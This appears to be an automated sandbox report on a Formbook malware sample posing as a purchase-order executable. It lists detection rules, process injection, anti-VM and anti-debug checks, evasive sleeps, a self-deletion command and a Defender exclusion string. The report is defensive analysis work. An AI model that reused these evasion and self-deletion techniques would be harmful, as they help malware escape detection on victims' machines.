Source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: NEW ORDER SOR 10531220.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/1@3/2

Creates files inside the user directory

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW ORDER SOR 10531220.exe.log

Jump to behavior

Creates mutexes

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_01

PE file has an executable .text section and no other executable section

Source: NEW ORDER SOR 10531220.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Reads software policies

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

SQL strings found in memory and binary data

Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Sample is known by Antivirus

Source: NEW ORDER SOR 10531220.exe	Virustotal: Detection: 60%
Source: NEW ORDER SOR 10531220.exe	Metadefender: Detection: 20%
Source: NEW ORDER SOR 10531220.exe	ReversingLabs: Detection: 51%

Sample might require command line arguments

Source: NEW ORDER SOR 10531220.exe

String found in binary or memory: &Report-HelpToolStripMenuItem1

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe 'C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe'
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process created: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process created: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process created: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process created: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe'			Jump to behavior

Uses Microsoft Silverlight

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

PE file contains a COM descriptor data directory

Source: NEW ORDER SOR 10531220.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: NEW ORDER SOR 10531220.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

PE file contains a debug data directory

Source: NEW ORDER SOR 10531220.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: netsh.pdb source: NEW ORDER SOR 10531220.exe, 00000003.00000002.310618621.0000000002E50000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: NEW ORDER SOR 10531220.exe, 00000003.00000002.306018733.00000000010C0000.00000040.00000001.sdmp, netsh.exe, 0000000F.00000002.504469970.0000000000D20000.00000040.00000001.sdmp
Source:	Binary string: netsh.pdbGCTL source: NEW ORDER SOR 10531220.exe, 00000003.00000002.310618621.0000000002E50000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: NEW ORDER SOR 10531220.exe, 00000003.00000002.306018733.00000000010C0000.00000040.00000001.sdmp, netsh.exe

Data Obfuscation:

Binary contains a suspicious time stamp

Source: NEW ORDER SOR 10531220.exe

Static PE information: 0x9FBA10BA [Tue Dec 1 20:55:22 2054 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00416950 push eax; retf		3_2_00416951
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_0041C167 push ebp; iretd		3_2_0041C16A
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00417237 push es; retf		3_2_00417238
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00416BCC push cs; retf		3_2_00416BD4
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_0040E394 push ebp; ret		3_2_0040E395
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00416486 push ecx; retf		3_2_0041648C
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_0041DD91 push edi; ret		3_2_0041DD93
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_0041DE8C push FFFFFF81h; ret		3_2_0041DE8F
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_0041CEB5 push eax; ret		3_2_0041CF08
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_0041CF6C push eax; ret		3_2_0041CF72
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_0041CF02 push eax; ret		3_2_0041CF08
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_0041CF0B push eax; ret		3_2_0041CF72
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_004077BF pushfd ; retf		3_2_004077C0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D9D0D1 push ecx; ret		15_2_00D9D0E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00186950 push eax; retf		15_2_00186951
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_0018C167 push ebp; iretd		15_2_0018C16A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00187237 push es; retf		15_2_00187238
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_0017E394 push ebp; ret		15_2_0017E395
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00186BCC push cs; retf		15_2_00186BD4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00186486 push ecx; retf		15_2_0018648C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_0018DD91 push edi; ret		15_2_0018DD93
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_0018DE8C push FFFFFF81h; ret		15_2_0018DE8F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_0018CEB5 push eax; ret		15_2_0018CF08
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_0018CF0B push eax; ret		15_2_0018CF72
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_0018CF02 push eax; ret		15_2_0018CF08
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_0018CF6C push eax; ret		15_2_0018CF72
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_001777BF pushfd ; retf		15_2_001777C0

Binary may include packed or encrypted code

Source: initial sample

Static PE information: section name: .text entropy: 7.87523328982

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE0

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NEW ORDER SOR 10531220.exe PID: 3756, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 00000000001798E4 second address: 00000000001798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000000179B5E second address: 0000000000179B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe

Code function: 3_2_00409A90 rdtsc

3_2_00409A90

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe TID: 4988	Thread sleep time: -104379s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe TID: 2964	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\explorer.exe TID: 6292	Thread sleep time: -54000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 7092	Thread sleep time: -55000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Contains medium sleeps (>= 30s)

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Thread delayed: delay time: 104379			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000005.00000000.272356780.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000005.00000000.255542441.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.271861542.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000005.00000002.503945034.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.272500870.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000005.00000000.263138702.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000005.00000000.271861542.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.271861542.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.272500870.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000005.00000000.271861542.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Queries a list of all running processes

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe

Code function: 3_2_00409A90 rdtsc

3_2_00409A90

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe

Code function: 3_2_0040ACD0 LdrLoadDll,

3_2_0040ACD0

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DDB8D0 mov eax, dword ptr fs:[00000030h]		15_2_00DDB8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DDB8D0 mov ecx, dword ptr fs:[00000030h]		15_2_00DDB8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DDB8D0 mov eax, dword ptr fs:[00000030h]		15_2_00DDB8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DDB8D0 mov eax, dword ptr fs:[00000030h]		15_2_00DDB8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DDB8D0 mov eax, dword ptr fs:[00000030h]		15_2_00DDB8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DDB8D0 mov eax, dword ptr fs:[00000030h]		15_2_00DDB8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E014FB mov eax, dword ptr fs:[00000030h]		15_2_00E014FB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC6CF0 mov eax, dword ptr fs:[00000030h]		15_2_00DC6CF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC6CF0 mov eax, dword ptr fs:[00000030h]		15_2_00DC6CF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC6CF0 mov eax, dword ptr fs:[00000030h]		15_2_00DC6CF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E18CD6 mov eax, dword ptr fs:[00000030h]		15_2_00E18CD6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D458EC mov eax, dword ptr fs:[00000030h]		15_2_00D458EC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5849B mov eax, dword ptr fs:[00000030h]		15_2_00D5849B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D49080 mov eax, dword ptr fs:[00000030h]		15_2_00D49080
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC3884 mov eax, dword ptr fs:[00000030h]		15_2_00DC3884
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DC3884 mov eax, dword ptr fs:[00000030h]		15_2_00DC3884
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7F0BF mov ecx, dword ptr fs:[00000030h]		15_2_00D7F0BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7F0BF mov eax, dword ptr fs:[00000030h]		15_2_00D7F0BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7F0BF mov eax, dword ptr fs:[00000030h]		15_2_00D7F0BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D890AF mov eax, dword ptr fs:[00000030h]		15_2_00D890AF
